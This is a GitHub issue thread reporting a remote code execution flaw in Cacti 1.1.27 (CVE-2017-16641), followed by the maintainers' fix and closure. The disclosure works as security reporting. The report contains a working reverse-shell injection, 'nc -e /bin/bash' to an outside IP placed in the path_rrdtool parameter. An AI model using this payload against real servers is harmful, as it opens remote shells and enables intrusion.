Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Critical vuln in cacti 1.1.27 #1057

Closed
cibvetr2 opened this issue Nov 1, 2017 · 7 comments
Closed

Critical vuln in cacti 1.1.27 #1057

cibvetr2 opened this issue Nov 1, 2017 · 7 comments

Comments

@cibvetr2
Copy link

cibvetr2 commented Nov 1, 2017

We (worlak2 and cibvetr2) found RCE vuln with black-box fuzzing.
PoC
1)Send in POST parameter path_rrdtool -> nc -e /bin/bash 192.168.1.214 1337 #
default
2) Ater 2-5 minutes we have backconnect shell
default
It’s triggered after execute poller.php in process. We think that because $command not filtered in ./lib/rrd.php:39-40

With regards worlak2 and cibvetr2

@cigamit
Copy link
Member

cigamit commented Nov 4, 2017

We will address this using two techniques. The first will be to conduct validation on the two form types: dirpath, and filepath. If, for these two form types, either the directory does not exist, or the file does not exist, the save will be rejected.

Then, as you mentioned, in the case where for some reason a Cacti admin has intentionally added a back door, or some SQL injection has allowed this modification, we will pre-check the path as you described.

cigamit added a commit that referenced this issue Nov 4, 2017
- Potential vulnerability in RRDtool functions
- Adding validation to both dirpath and filepath, also verification of
executable status to files in RRDtool function.
- Spurious htmlspecialchars() to html_escape() calls
- Minor SQL formatting for readability
@cigamit
Copy link
Member

cigamit commented Nov 4, 2017

Resolved, and thanks for reporting! We really appreciate those who comb the Cacti code for potential exploits.

@cigamit cigamit closed this as completed Nov 4, 2017
@cibvetr2
Copy link
Author

cibvetr2 commented Nov 5, 2017

Thanks for answer, but we think thats need to enumerate of CVE

@ronytomen
Copy link
Member

Is there a open CVE for this issue? If not, please submit your findings and get us a CVE.

@ronytomen ronytomen reopened this Nov 5, 2017
@worlak2
Copy link

worlak2 commented Nov 5, 2017

We didn't open CVE for this issue. We will send shortly

@cibvetr2
Copy link
Author

cibvetr2 commented Nov 7, 2017

Use CVE-2017-16641

@DavidLiedke
Copy link
Contributor

@ronytomen now it can be closed

@cigamit cigamit closed this as completed Nov 11, 2017
@github-actions github-actions bot locked as resolved and limited conversation to collaborators Jun 30, 2020
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants